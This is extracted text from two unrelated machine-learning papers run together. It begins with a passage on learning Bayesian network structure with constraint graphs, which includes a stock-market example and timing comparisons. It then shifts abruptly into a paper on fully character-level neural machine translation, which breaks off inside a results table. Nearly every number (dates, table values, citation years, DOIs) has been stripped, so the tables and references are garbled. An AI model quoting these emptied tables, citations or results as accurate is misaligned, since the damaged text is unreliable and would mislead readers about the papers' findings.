network schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. aapl-open xom-close msft-open rtn-close orcl-close googl-open cob-close googl-closebrk.a-close jnj-open gfrd-close wfc-close ge-close pg-open rdsb-close fb-close t-closecvx-close vz-open t-open deb-close ved-open bwng-open bwng-close keisei-open time tse ftse nyse a b opening closing figure a section of the learned bayesian network of the global stock market. (a) the constraint graph contains six nodes, the opening and closing prices for each of the three markets. these are con- nected such that the closing prices in a market depend on the opening prices but also the most recent in- ternational activity. (b) the most connected subset of stocks from the learned network covering vari- ables. over all variables is clearly infeasible, so we encode in our constraint graph some common-sense restrictions (fig. a). specifically, opening and closing prices for the same market are grouped into separate nodes, for a total of six nodes in the constraint graph. there are no self-loops because the opening price of one stock does not influence the opening price of another stock. naturally, the closing prices of one group of stocks are influenced by the opening price of the stocks from the same market, but they are also influenced by the opening or closing prices of any markets which opened or closed in the meantime. for instance, the tse closes after the ftse opens, so the ftse opening prices have the opportunity to influence the tse closing prices. however, the tse closes before the nyse opens, so the nyse cannot influence those stock prices. the dataset consists of opening and closing prices from these stocks between december nd, and november th, , binarized to indicate whether the value was an increase compared to the prior price seen. the resulting bayesian network has some interesting connections (fig. b). for example, the opening price of microsoft influences the closing price of raytheon, and the closing price of debenhams plc, a british multinational realtor, influences the closing price of ge. in addition, there were some surprising and unexplained connections, such as google and johnson & johnson influencing the closing price of cobham plc, a british defense firm. given that this example is primarily to illustrate the types of constraints a constraint graph can easily model, we suggest caution in thinking too deeply about these connections. schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table model comparison between naive bayes, bayesian network classifiers (bnc), and random for- est. three algorithms were evaluated on the uci handwritten digits dataset, fed in the binarized value cor- responding to whether the intensity of a pixel was above average. the fitting time and test set accuracy are reported for each algorithm. model train time (s) test set accuracy naive bayes . . bnc . . random forest . . it took only∼ s on a computer with modest hardware to run bnsl over samples. if we set the maximum number of parents to three, which is the empirically determined maximum number of parents, then it only takes∼ s to run. in contrast it would be infeasi- ble to run the exact bnsl algorithm on even half the number of variables considered here. constraint graphs allow learning of bayesian network classifiers bayesian network classifiers are an extension of bayesian networks to supervised learning tasks by defining a bayesian network over both the feature variables and the target variables together. normal inference methods are used to predict the target variables given the observed feature variables. in the case where feature variables are always observed, only the markov blanket of the target variables must be defined, i.e., their parents and children. the other variables are independent of the target variables and can be discarded, serving as a form of feature selection. a popular bayesian network classifier is the naive bayes classifier that defines a single class variable as the parent to all feature variables. a natural extension to this method is to learn which features are useful, instead of assuming they all are, thereby combining feature selection with parameter learning in a manner that has some similarities to decision trees. this approach can be modeled by using a constraint graph that has all feature variables x in one node and all target variables y in its parent node, such that y →x. we empirically evaluated the performance of learning a simple bayesian network classifier on the uci digits dataset. the digits dataset is a collection of × images of handwritten digits, where the features are discretized values between and representing the intensity of that pixel and the labels are between and representing the digit stored there. we learn a bayesian network where the pixels are in one node in the constraint graph and the class label is by itself it another node in the constraint graph that serves as a parent. we then train a bayesian network classifier, a naive bayes classifier, and a random forest classifier comprised of trees, on a test set of , images and test their performance on a held out images. as expected, the learned bayesian network classifier falls between naive bayes and the random forest in terms of both training time and test set performance (table ). futhermore, more complicated bayesian network classifiers can be learned with different constraint graphs. one interesting extension is that instead of constraining all features to be children of the target variable, to allow features to be either parents or children of the target variable. this can be specified by a cyclic constraint graph where y →x →y, preventing schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table algorithm comparison on a node with a self loop and other parents. the exact algorithm and the constrained algorithm proposed here were on a scc comprosied of a main node with a self loop and one parent node. shown are the results of increasing the number of variables in the main node while keep- ing the variables in the parent node steady at five, and the results of increasing the number of variables in the parent node while keeping the number of variables in the main node constant. for both algorithms we show the number of nodes across all parent graphs (pgn), the number of nodes in the order graph (ogn), the number of edges in the order graph (oge) and the time to compute. exact constraint graph pgn ogn oge time (s) pgn ogn oge time (s) variables , , . , . , , , . , , . , , , , , . , , , . parents , , . , . , , , . , . , , , , , . , . the model from spending time identifying dependencies between the features. finally, in cases where some features may be missing, it may be beneficial to model all dependencies between the features in order to allow inference to flow from observed variables not directly connected to the target variables to the target variables. this can be modeled by adding a self loop on the features variables x, allowing all edges to be learned except those between pairs of target variables. learning a bayesian network classifier in this manner will suffer from the same computational challenges as an unconstrained version, given the looseness of the constraints. self-loops and parents we then turn to the case where the strongly connected component is a main node with a self loop and a parent node. because an order graph is defined only over the variables in the main node its size is invariant to the number of variables in the parent node, allowing for speed improvements when it comes to calculating the shortest path. in addition, parent graphs are only defined for variables in the parent set, and so while they are not smaller than the ones in the exact algorithm, there are fewer. we compare the computational time and complexity of the underlying order and parent graphs between the exact algorithm over the full set of variables and the modified algorithm based on a constraint graph (table ). the data consisted of randomly generated binary values, because the running time does not depend on the presence of underlying structure in the data. we note that in all cases there are significant speed improvements and simpler graphs but that there are particularly encouraging speed improvements when the number of variables in the main node are increased. this suggests that it is always worth the time to identify which variables can be moved from a node with a self loop to a separate node. schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. c d a b figure cyclic constraint graphs. (a) this constraint graph is comprised of a simple two node cy- cle with each node containing four variables. (b) the learned bayesian network on random data where some variables were forced to identical values. each circle here corresponds to a variable in the resulting bayesian network instead of a node in the constraint graph. there were multiple possible cycles which could have been formed but the constraint graph prevented that from occuring. (c) this constraint graph now encodes a four node cycle each with four variables. (d) the learned bayesian network on random data with two distinct loops of identical values forced. again, no loops are formed. cyclic constraint graphs lastly, we consider constraint graphs that encode cyclic prior knowledge. we visually inspect the results from cyclic constraint graphs to ensure that they do not produce cyclic bayesian networks even when the potential exists. two separate constraint graphs are inspected, a two node cycle and a four node cycle (figs. a and c). the dataset is comprised of random binary values, where the value of one variable in the cycle is copied to the other variables in the cycle to add synthetic structure. however, by jointly solving all nodes cycles are avoided while dependencies are still captured (figs. b and d). we then compare the exact algorithm without constraints to the use of an appropriate constraint graph in a similer manner as before (table ). this is done first for four node cycles where we increase the number of variables in each node of the constraint graph and then for increasing sized cycles with three variables per node. the exact algorithm likely produces structures that are invalid according to the constraints and so this comparison is done solely to highlight that efficiencies are gained by considering the constraints. in each case using a constraint graph yields simpler parent and order graphs and the computational time is significantly reduced. the biggest difference is in the number of nodes in the parent graphs, as the constraints place significant limitations on which variables are allowed to be parents for which other variables. since the construction of the parent graph is the only part of the algorithm which considers the dataset itself it is unsurprising that significant savings are achieved for larger datasets when much smaller parent graphs are used. schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table algorithm comparison on a cyclic constraint graph. the exact algorithm and the constrained algorithm proposed here were run for four node cycles with differing numbers of variables, cycles with different numbers of nodes but three variables per node, and differing numbers of sam- ples for a four-node, three-variable cycle. all experiments with differing numbers of variables or nodes were run on , randomly generated sam- ples. shown for both algorithms are the number of nodes across all parent graphs (pgn), the number of nodes in the order graph (ogn), the num- ber of edges in the order graph (oge) and the time to compute. since the number of nodes does not change as a function of samples those values are not repeated in the blank cells. exact exact pgn ogn oge time (s) pgn ogn oge time (s) variables . . , , . . , , , . , , . , , , . , , . nodes . . , , , . , , . , , , , , . , , , . samples , , , . , , . , – – – . – – – . , – – – . – – – . , – – – . – – – . discussion constraint graphs are a flexible way of encoding into the bnsl task prior knowledge concerning the relationships among variables. the graph structure can be exploited to identify potentially massive computational gains, and acyclic constraint graphs make problems tractable which would be infeasible to solve without constraints. this is particularly useful in cases where there are both a great number of variables and many constraints present from prior knowledge. we anticipate that the automatic manner in which parallelizable subtasks are identified in a constraint graph will be of particular interest given the recent increase in availability of distributed computing. although the networks learned in this paper are discrete, the same principles can be applied to all types of bayesian networks. because the constraint graph represents only a restriction in the parent set on a variable-by-variable basis, the same algorithms that are used to learn linear gaussian or hybrid networks can be seamlessly combined with the idea of a constraint graph. in addition, most of the approximation algorithms which have been developed for bnsl can be modified to take into account constraints because these algorithms simply encode a limitation on the parent set for each variable. one could extend constraint graphs in several interesting ways. the first is to assign weights to edges so that the weight represents the prior probability that the variables in the parent set are parents of the variables in the child set, perhaps as pseudocounts to take into account when coupled with a bayesian scoring function. a second way is to incorporate ‘‘hidden nodes’’ that are variables which model underlying, onobserved phenomena and schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. can be used to reduce the parameterization of the network. several algorithms have been proposed for learning the structure of a bayesian network given hidden variables (elidan et al., ; elidan & friedman, ; friedman, ). modifying these algorithms to obey a constraint graph seems like a promising way to incorporate restrictions on this difficult task. a final way may be to encode ancestral relationships instead of direct parent relationships, indicating that a given variable must occur at some point before some other variable in the topological ordering. acknowledgements we would like to acknowledge maxwell libbrecht, scott lundberg, and brandon malone for many useful discussions and comments on drafts of the paper. additional information and declarations funding this work is supported by an nsf igert grant dge- . there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nsf igert: dge- . competing interests the authors declare there are no competing interests. author contributions • jacob m. schreiber conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • william s. noble analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: code implementing the concept is available at github: www.github.com/jmschrei/pomegranate data and code reproducing the figures are available at github: https://github.com/ jmschrei/constraint_graphs. references campos c, ji q. . efficient structure learning of bayesian networks using constraints. journal of machine learning research : – . schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com www.github.com/jmschrei/pomegranate https://github.com/jmschrei/constraint_graphs https://github.com/jmschrei/constraint_graphs http://dx.doi.org/ . /peerj-cs. chow c, liu c. . approximating discrete probability distributions with dependence trees. ieee transactions on information theory ( ): – . cooper g, herskovits e. . a bayesian method for the induction of probabilistic networks from data. machine learning : – doi . /bf . elidan g, friedman n. . learning hidden variable networks: the information bottleneck approach. journal of machine learning research : – . elidan g, lotner n, friedman n, koller d. . discovering hidden variables: a structure-based approach. in: leen tk, dietterich tg, tresp v, eds. advances in neural information processing systems (nips), vol. , – . fan x, malone bm, yuan c. . finding optimal bayesian network structures with constraints learned from data. in: uai’ proceedings of the thirtieth conference on uncertainty in artificial intelligence, – . friedman n. . learning belief networks in the presence of missing values and hidden variables. in: icml’ proceedings of the fourteenth international conference on machine learning, – . gamberoni g, lamma e, riguzzi f, storari s, volinia s. . bayesian networks learn- ing for gene expression datasets. in: advances in intelligent data analysis vi: th inter- national symposium on intelligent data analysis, – doi . / _ . heckerman d, geiger d, chickering d. . learning bayesian networks: the combina- tion of knowledge and statistical data. machine learning : – . jaakkola t, sontag d, globerson a, meila m. . learning bayesian network structure using lp relaxations. in: proceedings of the thirteenth international conference on artificial intelligence and statistics (aistats- ), – . malone bm, yuan c, hansen ea. . memory-efficient dynamic programming for learning optimal bayesian networks. in: proceedings of the twenty-fifth aaai conference on artificial intelligence. moore a, wong w. . optimal reinsertion: a new search operator for accelerated and more accurate bayesian network structure learning. in: proceedings of the th international conference on machine learning (icml- ), – . ordyniak s, szeider s. . parameterized complexity results for exact bayesian network structure learning. journal of artificial intelligence research : – . perrier e, imoto s, miyano s. . finding optimal bayesian network given a super- structure. journal of machine learning research : – . schneiderman h. . learning a restricted bayesian network for object detection. in: proceedings of the ieee computer society conference on computer vision and pattern recognition. ieee, – . suzuki j. . learning bayesian belief networks based on the minimum description length principle: an efficient algorithm using the b & b technique. in: machine learning, proceedings of the thirteenth international conference (icml’ ). tarjan r. . depth-first search and linear graph algorithms. siam journal of computing : – . tsamardinos i, brown le, aliferis cf. . the max–min hill-climbing bayesian network structure learning algorithm. machine learning : – . schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bf http://dx.doi.org/ . / _ http://dx.doi.org/ . /peerj-cs. yuan c, malone bm, wu x. . learning optimal bayesian networks using a* search. in: ijcai proceedings-international joint conference on artificial intelligence. zhou h, sakane s. . learning bayesian network structure from environment and sensor planning for mobile robot localization. in: proceedings of ieee international conference on multisensor fusion and integration for intelligent systems, mfi doi . /mfi- . . . zuo y, kita e. . up/down analysis of stock index by using bayesian network. engineering management research : – . schreiber and and noble ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /mfi- . . http://dx.doi.org/ . /peerj-cs. research collection journal article fully character-level neural machine translation without explicit segmentation author(s): lee, jason; cho, kyunghyun; hofmann, thomas publication date: - permanent link: https://doi.org/ . /ethz-b- rights / license: creative commons attribution . international this page was generated automatically upon download from the eth zurich research collection. for more information please consult the terms of use. eth library https://doi.org/ . /ethz-b- http://creativecommons.org/licenses/by/ . / https://www.research-collection.ethz.ch https://www.research-collection.ethz.ch/terms-of-use fully character-level neural machine translation without explicit segmentation jason lee∗ eth zürich jasonlee@inf.ethz.ch kyunghyun cho new york university kyunghyun.cho@nyu.edu thomas hofmann eth zürich thomas.hofmann@inf.ethz.ch abstract most existing machine translation systems op- erate at the level of words, relying on ex- plicit segmentation to extract tokens. we in- troduce a neural machine translation (nmt) model that maps a source character sequence to a target character sequence without any seg- mentation. we employ a character-level con- volutional network with max-pooling at the encoder to reduce the length of source rep- resentation, allowing the model to be trained at a speed comparable to subword-level mod- els while capturing local regularities. our character-to-character model outperforms a recently proposed baseline with a subword- level encoder on wmt’ de-en and cs- en, and gives comparable performance on fi- en and ru-en. we then demonstrate that it is possible to share a single character- level encoder across multiple languages by training a model on a many-to-one transla- tion task. in this multilingual setting, the character-level encoder significantly outper- forms the subword-level encoder on all the language pairs. we observe that on cs-en, fi-en and ru-en, the quality of the multilin- gual character-level translation even surpasses the models specifically trained on that lan- guage pair alone, both in terms of the bleu score and human judgment. introduction nearly all previous work in machine translation has been at the level of words. aside from our intu- ∗the majority of this work was completed while the author was visiting new york university. itive understanding of word as a basic unit of mean- ing (jackendoff, ), one reason behind this is that sequences are significantly longer when rep- resented in characters, compounding the problem of data sparsity and modeling long-range depen- dencies. this has driven nmt research to be al- most exclusively word-level (bahdanau et al., ; sutskever et al., ). despite their remarkable success, word-level nmt models suffer from several major weaknesses. for one, they are unable to model rare, out-of- vocabulary words, making them limited in translat- ing languages with rich morphology such as czech, finnish and turkish. if one uses a large vocabulary to combat this (jean et al., ), the complexity of training and decoding grows linearly with respect to the target vocabulary size, leading to a vicious cycle. to address this, we present a fully character-level nmt model that maps a character sequence in a source language to a character sequence in a target language. we show that our model outperforms a baseline with a subword-level encoder on de-en and cs-en, and achieves a comparable result on fi-en and ru-en. a purely character-level nmt model with a basic encoder was proposed as a base- line by luong and manning ( ), but training it was prohibitively slow. we were able to train our model at a reasonable speed by drastically reducing the length of source sentence representation using a stack of convolutional, pooling and highway layers. one advantage of character-level models is that they are better suited for multilingual translation than their word-level counterparts which require a separate word vocabulary for each language. we transactions of the association for computational linguistics, vol. , pp. – , . action editor: adam lopez. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. verify this by training a single model to translate four languages (german, czech, finnish and rus- sian) to english. our multilingual character-level model outperforms the subword-level baseline by a considerable margin in all four language pairs, strongly indicating that a character-level model is more flexible in assigning its capacity to different language pairs. furthermore, we observe that our multilingual character-level translation even exceeds the quality of bilingual translation in three out of four language pairs, both in bleu score metric and human evaluation. this demonstrates excel- lent parameter efficiency of character-level transla- tion in a multilingual setting. we also showcase our model’s ability to handle intra-sentence code- switching while performing language identification on the fly. the contributions of this work are twofold: we empirically show that ( ) we can train character-to- character nmt model without any explicit segmen- tation; and ( ) we can share a single character-level encoder across multiple languages to build a mul- tilingual translation system without increasing the model size. background: attentional neural machine translation neural machine translation (nmt) is a recently proposed approach to machine translation that builds a single neural network which takes as an input, a source sentence x = (x , . . . ,xtx ) and generates its translation y = (y , . . . ,yty ), where xt and yt′ are source and target symbols (bahdanau et al., ; sutskever et al., ; luong et al., ; cho et al., a). attentional nmt models have three components: an encoder, a decoder and an attention mechanism. encoder given a source sentence x, the en- coder constructs a continuous representation that summarizes its meaning with a recurrent neural network (rnn). a bidirectional rnn is often implemented as proposed in (bahdanau et al., ). a forward encoder reads the input sentence from left to right: −→ h t = −→ fenc ( ex(xt), −→ h t− ) . similarly, a backward encoder reads it from right to left: ←− h t = ←− fenc ( ex(xt), ←− h t+ ) , where ex is the source embedding lookup table, and −→ fenc and←− fenc are recurrent activation functions such as long short-term memory units (lstms) (hochreiter and schmidhuber, ) or gated recurrent units (grus) (cho et al., b). the encoder constructs a set of continuous source sentence representations c by concatenating the forward and backward hid- den states at each timestep: c = { h , . . . ,htx } , where ht = [−→ h t; ←− h t ] . attention first introduced in bahdanau et al. ( ), the attention mechanism lets the decoder at- tend more to different source symbols for each target symbol. more concretely, it computes the context vector ct′ at each decoding time step t′ as a weighted sum of the source hidden states: ct′ = ∑tx t= αt′tht. similarly to chung et al. ( ) and firat et al. ( a), each attentional weight αt′t represents how relevant the t-th source token xt is to the t′-th target token yt′, and is computed as: αt′t = z exp ( score ( ey(yt′− ),st′− ,ht )) , ( ) where z = ∑tx k= exp ( score(ey(yt′− ),st′− ,hk) ) is the normalization constant. score() is a feed- forward neural network with a single hidden layer that scores how well the source symbol xt and the target symbol yt′ match. ey is the target embedding lookup table and st′ is the target hidden state at time t′. decoder given a source context vector ct′, the de- coder computes its hidden state at time t′ as: st′ = fdec ( ey(yt′− ),st′− ,ct′ ) . then, a parametric func- tion outk() returns the conditional probability of the next target symbol being k: p(yt′ =k|y<t′,x) = z exp ( outk ( ey(yt′− ),st′,ct′ )) ( ) where z is again the normalization constant: z = ∑ j exp ( outj(ey(yt′− ),st′,ct′) ) . training the entire model can be trained end-to- end by minimizing the negative conditional log- likelihood, which is defined as: l = − n n∑ n= t (n) y∑ t= log p(yt = y (n) t |y (n) <t ,x (n)), where n is the number of sentence pairs, and x(n) and y(n)t are the source sentence and the t-th target symbol in the n-th pair, respectively. fully character-level translation . why character-level? the benefits of character-level translation over word-level translation are well known. chung et al. ( ) present three main arguments: character level models ( ) do not suffer from out-of-vocabulary is- sues, ( ) are able to model different, rare morpho- logical variants of a word, and ( ) do not require seg- mentation. particularly, text segmentation is highly non-trivial for many languages and problematic even for english as word tokenizers are either manually designed or trained on a corpus using an objective function that is unrelated to the translation task at hand, which makes the overall system sub-optimal. here we present two additional arguments for character-level translation. first, a character-level translation system can easily be applied to a mul- tilingual translation setting. between european lan- guages where the majority of alphabets overlaps, for instance, a character-level model may easily iden- tify morphemes that are shared across different lan- guages. a word-level model, however, will need a separate word vocabulary for each language, allow- ing no cross-lingual parameter sharing. also, by not segmenting source sentences into words, we no longer inject our knowledge of words and word boundaries into the system; instead, we encourage the model to discover an internal struc- ture of a sentence by itself and learn how a sequence of symbols can be mapped to a continuous meaning representation. . related work to address these limitations associated with word- level translation, a recent line of research has inves- tigated using sub-word information. costa-jussá and fonollosa ( ) replaced the word-lookup table with convolutional and highway layers on top of character embeddings, while still segmenting source sentences into words. target sen- tences were also segmented into words, and predic- tions were made at word-level. similarly, ling et al. ( ) employed a bidirec- tional lstm to compose character embeddings into word embeddings. at the target side, another lstm takes the hidden state of the decoder and generates the target word, character by character. while this system is completely open-vocabulary, it also re- quires offline segmentation. character-to-word and word-to-character lstms significantly slow down training, as well. most recently, luong and manning ( ) pro- posed a hybrid scheme that consults character-level information whenever the model encounters an out- of-vocabulary word. as a baseline, they also imple- mented a purely character-level nmt model with layers of unidirectional lstms with cells, with attention over each character. despite being extremely slow (approximately months to train), the character-level model gave a comparable perfor- mance to the word-level baseline. this shows the possibility of fully character-level translation. having a word-level decoder restricts the model to only being able to generate previously seen words. sennrich et al. ( ) introduced a subword-level nmt model that is capable of open-vocabulary translation using subword-level segmentation based on the byte pair encoding (bpe) algorithm. starting from a character vocabulary, the algorithm identi- fies frequent character n-grams in the training data and iteratively adds them to the vocabulary, ulti- mately giving a subword vocabulary which consists of words, subwords and characters. once the seg- mentation rules have been learned, their model per- forms subword-to-subword translation (bpe bpe) in the same way as word-to-word translation. perhaps the work that is closest to our end goal is (chung et al., ), which used a subword-level encoder from (sennrich et al., ) and a fully character-level decoder (bpe char). their results show that character-level decoding performs better than subword-level decoding. motivated by this work, we aim for fully character-level translation at both sides (char char). outside nmt, our work is based on a few exist- ing approaches that applied convolutional networks to text, most notably in text classification (zhang et al., ; xiao and cho, ). we also drew in- spiration for our multilingual models from previous work that showed the possibility of training a single recurrent model for multiple languages in domains other than translation (tsvetkov et al., ; gillick et al., ). . challenges sentences are on average (de, cs and ru) to (fi) times longer when represented in characters. this poses three major challenges to achieving fully character-level translation. ( ) training/decoding latency for the decoder, al- though the sequence to be generated is much longer, each character-level softmax operation costs consid- erably less compared to a word- or subword-level softmax. chung et al. ( ) report that character- level decoding is only % slower than subword- level decoding. on the other hand, computational complexity of the attention mechanism grows quadratically with respect to the sentence length, as it needs to attend to every source token for every target token. this makes a naive character-level approach, such as in luong and manning ( ), computationally prohibitive. consequently, reducing the length of the source sequence is key to ensuring reasonable speed in both training and decoding. ( ) mapping character sequence to continuous representation the arbitrary relationship between the orthography of a word and its meaning is a well- known problem in linguistics (de saussure, ). building a character-level encoder is arguably a more difficult problem, as the encoder needs to learn a highly non-linear function from a long sequence of character symbols to a meaning representation. ( ) long range dependencies in characters a character-level encoder needs to model dependen- cies over longer timespans than a word-level en- coder does. fully character-level nmt . encoder we design an encoder that addresses all the chal- lenges discussed above by using convolutional and pooling layers aggressively to both ( ) drastically shorten the input sentence; and ( ) efficiently capture local regularities. inspired by the character- level language model from kim et al. ( ), our encoder first reduces the source sentence length with a series of convolutional, pooling and highway layers. the shorter representation, instead of the full character sequence, is passed through a bidirectional gru to ( ) help it resolve long term dependencies. we illustrate the proposed encoder in figure and discuss each layer in detail below. embedding we map the sequence of source characters (x , . . . ,xtx) to a sequence of character embeddings of dimensionality dc: x = (c(x ), . . . ,c(xtx)) ∈ rdc×tx where tx is the number of source characters and c is the character embedding lookup table: c ∈ rdc×|c|. convolution one-dimensional convolution opera- tion is then used along consecutive character embed- dings. assuming we have a single filter f ∈ rdc×w of width w, we first apply padding to the beginning and the end of x, such that the padded sentence x′ ∈ rdc×(tx+w− ) is w − symbols longer. we then apply a narrow convolution between x′ and f such that the k-th element of the output yk is given as: yk = (x ′ ∗ f)k = ∑ i,j (x′[:,k−w+ :k] ⊗ f)ij, ( ) where ⊗ denotes elementwise matrix multiplication and ∗ is the convolution operation. x′ [:,k−w+ :k] is the sliced subset of x′ that contains all the rows but only w adjacent columns. the padding scheme em- ployed above, commonly known as half convolution, ensures that the length of the output is identical to the length of the input, (i.e., y ∈ r ×tx). we just illustrated how a single convolutional filter of fixed width might be applied to a sentence. in order to extract informative character patterns of different lengths, we employ a set of filters of varying widths. more concretely, we use a filter _ _ t h e s e c o n d p e r s o n _ _ single-layer convolution + relu max pooling with stride four-layer highway network single-layer bidirectional gru character embeddings ℝ#×%& ℝ()×(%&+,-#) ℝ/×%& ℝ/×(%& ⁄ ) ℝ/×(%& ⁄ ) segment embeddings figure : encoder architecture schematics. underscore denotes padding. a dotted vertical line delimits each segment. the stride of pooling s is in the diagram. bank f = {f , . . . ,fm} where fi = rdc×i×ni is a collection of ni filters of width i. our model uses m = , hence extracting character n-grams up to characters long. outputs from all the filters are stacked upon each other, giving a single repre- sentation y ∈ rn×tx , where the dimensionality of each column is given by the total number of filters n = ∑m i= ni. finally, rectified linear activation (relu) is applied elementwise to this representation. max pooling with stride the output from the con- volutional layer is first split into segments of width s, and max-pooling over time is applied to each seg- ment with no overlap. this procedure selects the most salient features to give a segment embedding. each segment embedding is a summary of meaning- ful character n-grams occurring in a particular (over- lapping) subsequence in the source sentence. note that the rightmost segment (above ‘on’) in figure may capture ‘son’ (the filter in green) although ‘s’ occurs in the previous segment. in other words, our segments are overlapping as opposed to in word- or subword-level models with hard segmentation. segments act as our internal linguistic unit from this layer and above: the attention mechanism, for instance, attends to each source segment instead of source character. this shortens the source repre- sentation s-fold: y ′ ∈ rn×(tx/s). empirically, we found using a smaller s leads to better performance at increased training time. we chose s = in our experiments as it gives a reasonable balance between the two. highway network a sequence of segment embed- dings from the max pooling layer is fed into a high- way network (srivastava et al., ). highway net- works are shown to significantly improve the qual- ity of a character-level language model when used with convolutional layers (kim et al., ). a high- way network transforms input x with a gating mech- anism that adaptively regulates information flow: y = g � relu(w x + b ) + ( −g)�x, where g = σ((w x + b )). we apply this to each segment embedding individually. recurrent layer finally, the output from the highway layer is given to a bidirectional gru from § , using each segment embedding as input. subword-level encoder unlike a subword-level encoder, our model does not commit to a specific choice of segmentation; instead it is trained to consider every possible character pattern and extract only the most meaningful ones. therefore, the definition of segmentation in our model is dynamic unlike subword-level encoders. during training, the model finds the most salient character patterns in a sentence via max-pooling, and the character bilingual bpe char char char vocab size , source emb. target emb. conv. filters - - - - - - - pool stride highway layers encoder -layer grus decoder -layer grus table : bilingual model architectures. the char char model uses filters of width , filters of width , · · · and filters of width . sequences extracted by the model change over the course of training. this is in contrast to how bpe segmentation rules are learned: the segmentation is learned and fixed before training begins. . attention and decoder similarly to the attention model in chung et al. ( ) and firat et al. ( a), a single-layer feed- forward network computes the attention score of next target character to be generated with every source segment representation. a standard two- layer character-level decoder then takes the source context vector from the attention mechanism and predicts each target character. this decoder was de- scribed as base decoder by chung et al. ( ). experiment settings . task and models we evaluate the proposed character-to-character (char char) translation model against subword- level baselines (bpe bpe and bpe char) on the wmt’ de→en, cs→en, fi→en and ru→en translation tasks. we do not consider word-level models, as it has already been shown that subword-level models outperform them by mit- igating issues inherent to closed-vocabulary transla- tion (sennrich et al., ; sennrich et al., ). indeed, subword-level nmt models have been the de-facto state-of-the-art and are now used in a very large-scale industry nmt system to serve millions of users per day (wu et al., ). http://www.statmt.org/wmt /translation -task.html we experiment in two different scenarios: ) a bilin- gual setting where we train a model on data from a single language pair; and ) a multilingual setting where the task is many-to-one translation. we train a single model on data from all four language pairs. hence, our baselines and models are: (a) bilingual bpe bpe: from (firat et al., a) (b) bilingual bpe char: from (chung et al., ) (c) bilingual char char (d) multilingual bpe char (e) multilingual char char we train all the models ourselves other than (a), for which we report the results from firat et al. ( a). we detail the configuration of our models in table and table . . datasets and preprocessing we use all available parallel data on the four lan- guage pairs from wmt’ : de-en, cs-en, fi-en and ru-en. for the bpe char baselines, we only use sentence pairs where the source is no longer than subword symbols. for our char char models, we only use pairs where the source sentence is no longer than characters. for all the language pairs apart from fi-en, we use newstest- as a develop- ment set and newstest- and newstest- as test sets. for fi-en, we use newsdev- and newstest- as development and test sets, respec- tively. we tokenize each corpus using the script from moses. when training bilingual bpe char models, we ex- tract , bpe operations from each of the source and target corpus using a script from sennrich et al. ( ). this gives a source bpe vocabulary of size k− k for each language. . training details each model is trained using stochastic gradient de- scent and adam (kingma and ba, ) with a learning rate of . and minibatch size . train- ing continues until the bleu score on the validation this is unnecessary for char char models, yet was carried out for comparison. https://github.com/moses-smt/mosesdecod er multilingual bpe char char char vocab size , source emb. target emb. conv. filters - - - - - - - pool stride highway layers encoder -layer grus decoder -layer grus table : multilingual model architectures. set stops improving. the norm of the gradient is clipped with a threshold of (pascanu et al., ). all weights are initialized from a uniform distribu- tion [− . , . ]. each model is trained on a single pre- gtx titan x gpu with gb ram. . decoding details as done by chung et al. ( ), a two-layer uni- directional character-level decoder with gru units is used for all our experiments. for decod- ing, we use a beam search algorithm with length- normalization to penalize shorter hypotheses. the beam width is for all models. . training multilingual models task description we train a model on a many-to- one translation task to translate a sentence in any of the four languages (german, czech, finnish and russian) to english. we do not provide a language identifier to the encoder, but merely the sentence itself, encouraging the model to perform language identification on the fly. in addition, by not providing the language identifier, we expect the model to handle intra-sentence code-switching seamlessly. model architecture the multilingual char char model uses slightly more convolutional filters than the bilingual char char model, namely ( - - - - - - - ). otherwise, the archi- tecture remains the same as shown in table . by not changing the size of the encoder and the decoder, we fix the capacity of the core translation module, and only allow the multilingual model to detect more character patterns. similarly, the multilingual bpe char model has the same encoder and decoder as the bilingual bpe char model, but a larger vocabulary. we learn , multilingual bpe operations on the multilingual corpus, resulting in , subwords. see table for the exact configuration of our multilingual models. data scheduling for the multilingual models, an appropriate scheduling of data from different lan- guages is crucial to avoid overfitting to one language too soon. following firat et al. ( a) and firat et al. ( b), each minibatch is balanced, in that the proportion of each language pair in a single mini- batch corresponds to that of the full corpus. with this minibatch scheme, roughly the same number of updates is required to make one full pass over the entire training corpus of each language pair. mini- batches from all language pairs are combined and presented to the model as a single minibatch. see table for the minibatch size for each language pair. de-en cs-en fi-en ru-en corpus size . m . m . m . m minibatch size table : the minibatch size of each language (second row) is proportionate to the number of sentence pairs in each corpus (first row). treatment of cyrillic to facilitate cross-lingual pa- rameter sharing, we convert every cyrillic charac- ter in the russian source corpus to latin alphabet according to iso- . table shows an example of how this conversion may help the multilingual mod- els identify lexemes that are shared across multiple languages. school schools cs škola školy ru школа школы ru (iso- ) škola školy table : czech and russian words for school and schools, alongside the conversion of russian characters into latin. multilingual bpe for the multilingual bpe char model, multilingual bpe segmentation rules are extracted from a large dataset containing training source corpora of all the language pairs. to ensure the bpe rules are not biased towards one language, setting src trg dev test test de-en (a)∗ bi bpe bpe . . (b) bi bpe char . . . (c) bi char char . . . (d) multi bpe char . . . (e) multi char char . . . cs-en (f)∗ bi bpe bpe . . (g) bi bpe char . . . (h) bi char char . . . (i) multi bpe char . . . (j) multi char char . . . fi-en (k)∗ bi bpe bpe . . (l) bi bpe char . . (m) bi char char . . (n) multi bpe char . . (o) multi char char . . ru-en (p)∗ bi bpe bpe . . (q) bi bpe char . . . (r) bi char char . . . (s) multi 